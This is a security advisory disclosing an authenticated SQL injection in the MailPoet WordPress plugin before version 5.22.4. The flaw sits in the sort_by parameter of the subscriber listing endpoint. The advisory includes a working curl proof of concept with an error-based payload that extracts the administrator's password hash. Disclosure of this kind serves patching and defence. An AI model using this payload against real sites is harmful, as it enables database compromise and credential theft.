MailPoet < 5.22.4 – Authenticated SQLi via sort_by

Description

The subscriber listing API's sort_by parameter uses HTML sanitization (Handler::filterString) instead of SQL identifier validation, then concatenates directly into a DBAL orderBy() call without parameterization. By default requires Admin access, but the mailpoet_manage_subscribers capability can be delegated to Editor/Shop Manager roles via the mailpoet_permission_manage_subscribers filter or Members plugin integration, enabling privilege escalation to full database access.

Proof of Concept

Requires user with mailpoet_manage_subscribers capability, valid nonce from MailPoet admin page, and a dynamic segment ID.

```bash
curl 'https://target.site/wp-admin/admin-ajax.php' \
  -H 'Cookie: <cookies>' \
  -H 'X-Requested-With: XMLHttpRequest' \
  --data-urlencode 'action=mailpoet' \
  --data-urlencode 'endpoint=subscribers' \
  --data-urlencode 'method=listing' \
  --data-urlencode 'token=<NONCE>' \
  --data-urlencode 'data[sort_by]=id, extractvalue(1, concat(0x7e, (select user_pass from wp_users where id=1), 0x7e))' \
  --data-urlencode 'data[filter][segment]=<SEGMENT_ID>'
```

Note: The data[filter][segment] parameter must reference a dynamic (non-static) segment ID to trigger the vulnerable DBAL code path.